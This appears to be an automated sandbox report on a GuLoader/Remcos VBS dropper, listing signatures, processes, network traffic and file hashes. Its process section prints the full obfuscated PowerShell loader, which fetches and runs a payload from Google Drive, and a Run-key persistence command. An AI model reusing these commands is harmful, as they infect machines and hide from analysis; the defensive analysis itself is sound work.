Malware Analysis Report

2025-01-02 03:18

Sample ID 240328-cgq8gsch4t
Target 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs
SHA256 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88
Tags
guloader downloader persistence remcos remotehost evasion rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88

Threat Level: Known bad

The file 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs was found to be: Known bad.

Malicious Activity Summary

guloader downloader persistence remcos remotehost evasion rat trojan

Remcos

UAC bypass

Guloader,Cloudeye

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-28 02:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-28 02:03

Reported

2024-03-28 02:05

Platform

win7-20240221-en

Max time kernel

118s

Max time network

135s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\Biotron = "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\\kostbare\\').Storbyer;%Habilitcar% ($Assaults)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1068 set thread context of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2300 wrote to memory of 2288 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 2288 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 2288 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2288 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2288 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2288 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1068 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2728 wrote to memory of 796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 796 wrote to memory of 584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 796 wrote to memory of 584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 796 wrote to memory of 584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 796 wrote to memory of 584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 7b4fdea2a0af3dbb3e9af46780e69650
SHA1 de69a8afb30d505ddd396ef3a4e8a1f29a433365
SHA256 6b1fa76d82599968c89764e75052e8d79e5dd4b1b161729424cdc987c5c63b7b
SHA512 191950acaceeced7a8ad35f7c4e825e709088942b59b2d118b1b1b57fab6428a0247fe5528bcd55e5f2ec8fb64eb153152458db69f894c93a692bc42fe0f7820

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 114a16150326060e22136b52754269d6
SHA1 9922af44d5ae3aad88e7142110b374d62b1e286e
SHA256 430d09dee4de6ed578860cb29ce7bc18aa71cb3d7ecc3b74f6c34b018fbed64a
SHA512 10fcd67bfeaf39bc099ec43688c58c168067ea6690bf40ecf3163745ac9b3829b2a1f3075151580ee4d9162e41d0eb6114687a9a63aaff0ffbc5217306a9e232

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 02e4cd84d747bc2788747f9b1ed0d45d
SHA1 68e4f5b99283b18bac4b74a608594ee20798cef0
SHA256 8b2215111f242c2225e54c7bc4cc67ba46613865b8e6e017e9d15d35c3af798c
SHA512 5855bd9fa5a938f527dfcd403649481d6efe944afd633bb6608c87bc91b68fe3ba6bc7a3398e2dbb41f82ae33cddbc9f1427b6daeae3b84f26940d1c3c9c2e03

memory/2288-261-0x000000001B380000-0x000000001B662000-memory.dmp

memory/2288-262-0x0000000002560000-0x0000000002568000-memory.dmp

memory/2288-263-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2288-264-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2288-266-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2288-265-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2288-267-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2288-268-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2288-269-0x000000001B2D0000-0x000000001B2F2000-memory.dmp

memory/2288-270-0x000000001B670000-0x000000001B682000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KTYM4BI8JR78KGXSH5QW.temp

MD5 5f0b428ed695041590e46a7587e144c6
SHA1 7d68cc7eb810576da45019040b46283c02ebb542
SHA256 f7c80ee652946c684bf7677e088858754c9da6590888b00c7291dcd3a8de0c35
SHA512 c049e75aceecbe81827fee6fef4ed57453ab224980407f1d5e74a7337edf0b28ec36389e11f1fcc3f06c5bf28bfdf0242d5f0693a417dea8147cbff1f1ab4bf2

memory/1068-273-0x0000000073410000-0x00000000739BB000-memory.dmp

memory/1068-274-0x00000000025A0000-0x00000000025E0000-memory.dmp

memory/1068-275-0x0000000073410000-0x00000000739BB000-memory.dmp

memory/2288-276-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/1068-277-0x00000000025A0000-0x00000000025E0000-memory.dmp

memory/2288-278-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2288-279-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2288-280-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2288-281-0x00000000024E0000-0x0000000002560000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab9E04.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5620b939b9fda048a3971e5d969ecf93
SHA1 ffe3b02a58f0018ee369942b91ca63198f6d0682
SHA256 6c951a8d3ab0185bf5d6dbf7fb73e39649b100e042ae13d5365b165e75384921
SHA512 619cdd150e4a4cea960c8da2a7d72612618bb4301e15472cc6edc3f7576bfd51392cb2d337ff1087c9c5028edb4b2e16eda2bc0103c10862837cd6cbd49946c7

memory/1068-293-0x0000000073410000-0x00000000739BB000-memory.dmp

memory/1068-295-0x00000000025A0000-0x00000000025E0000-memory.dmp

memory/1068-296-0x00000000025A0000-0x00000000025E0000-memory.dmp

